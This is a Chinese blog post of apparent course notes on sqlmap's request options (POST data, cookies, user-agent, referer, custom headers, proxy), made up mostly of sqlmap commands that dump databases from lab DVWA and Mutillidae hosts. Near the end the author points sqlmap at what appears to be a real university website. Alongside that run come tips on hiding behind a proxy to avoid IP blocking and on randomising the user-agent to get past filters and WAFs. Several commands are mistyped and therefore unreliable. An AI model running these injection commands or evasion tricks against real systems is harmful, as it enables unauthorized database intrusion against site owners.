SQLMAP自动注入(二)-REQUEST
来源:互联网 发布:数据库实例是什么 编辑:程序博客网 时间:2024/06/05 07:05
数据段: –data
get/post都适用
sqlmap -u “http://1.1.1.1/a.php” –data=”user=1&pass=2” -f
变量分隔符:–param-del
http://1.1.1.1/a.php?q=foo;id=1 // ; &
sqlmap -u “http://1.1.1.1/a.php” –data=”q=foo:id=1” –param-del=”;” -f
cookie头: –cookie
web应用需要基于cookie的身份认证
检查cookie中的注入点(sqlmap自动测试)
登录密码错误,302重定向之前的页面;
下面再看一下post的提交方法;
root@R:~# sqlmap -u "http://192.168.1.121mutillidae/index.php" --date="page=user-info.php&username=1&password=1&user-info-php-submit-butto=View+Account+Details" --users
问号去掉,–data=”参数”
因为DVWA是登陆后才能进行sql注入,所以这个时候就应该为sqlmap加上cookie,保证sqlmap登陆到DVWA的页面,才能模拟渗透;
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --dbs
level 1不会自动扫描cookie的漏洞;至少大于等于2;
我们需要在代码中加入–level 2这个指令;
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --level 2 --dbs
http头;
–user-agent(默认hsi)
sqlmap/1.0-dev-xxxxxx(http://sqlmap.org)
–random-agent(随机使用一个user-agent)
/user/share/sqlmap/txt/user-agents.txt
sqlmap检查user-agent中的注入点:Leve>=3
APP/WAF/IPS/IDS过滤异常user-agent时报错
[hh:mm:20][ERROR] the target URL responded with an unknow HTTP
Status code,try to force the HTTP User-Agent header with option –user-
agent or –random-agent
我们抓包看一下,还是上次的命令;为了清晰一点,我们先设置一下抓包的IP地址;
我们随便找一个看一下;右键,追踪流,TCP流;
如果对方做一个过滤规则,把sqlmap的user-agent删除掉,所以就会导致注入查找不成功;这个时候我们可以使用random,看下文件内容:
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --random-agent --dbs
tcp.stream eq 1会话流1
tcp.stream eq 2会话流2
我们也可以自己指定一个user-agent;
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --host="aaaaaaaaaaaaaaaaaa" -f
检测host头必须是level=5;不过这里一般很少有漏洞信息;
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" ----referer="aaaaaaaaaaaaaaaaaa" --level 3 -f
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" ----headers="Host:www.abc.com\nUser-Agent:bbbbbb\n" -f
指定get方法,也可以post;最好指定,有的网站会过滤这个地方;
最好使用代理服务器,防止对真实IP封堵;
找个网站,试一下;
root@R:~# sqlmap -u "http://zsb.ybu.edu.cn/index.php?id=135" --proxy="http//127.0.0.1:8087" -f
有可能被waf保护
- SQLMAP自动注入(二)-REQUEST
- SQLMAP自动注入-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION优化
- 【安全牛学习笔记】SQLMAP自动注入(二)
- 【安全牛学习笔记】课时94 SQLMAP自动注入-REQUEST和SQLMAP自动注入-OPTIMIZATION
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- SQLMAP- 自动注入
- sqlmap之(二)----注入前奏
- SQLMAP 脚本自动注入应用(burpsuit辅助)
- sqlmap自动的寻找注入点,
- 【安全牛学习笔记】SQLMAP- 自动注入
- Sqlmap使用指南(二)
- 【安全牛学习笔记】SQLMAP- 自动注入
- 【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES
- sqlmap用户手册(四)——注入
- SpringMVC之自动注入Request对象
- sqlmap注入语句整理
- sqlmap注入语句整理
- 浅析DNS解析过程
- 当焦点在SearchView中时,输入法不能处理KEYCODE_BACK按键的原因
- 最近在做微信支付
- 批量动态生成Button事件
- 互联网金融高并发方案
- SQLMAP自动注入(二)-REQUEST
- mongoDB的基础使用
- Ubuntu 下安装 Android Studio
- 阿里云服务器yum源更新问题
- RxJava运用技巧-RxAndroid部分源码解读
- 安装 caseprjs 和 phantomjs
- Jump Game II
- [SCU 4511] 任务 (状态优化DP)
- DirectX 在VS2012及以上版本的配置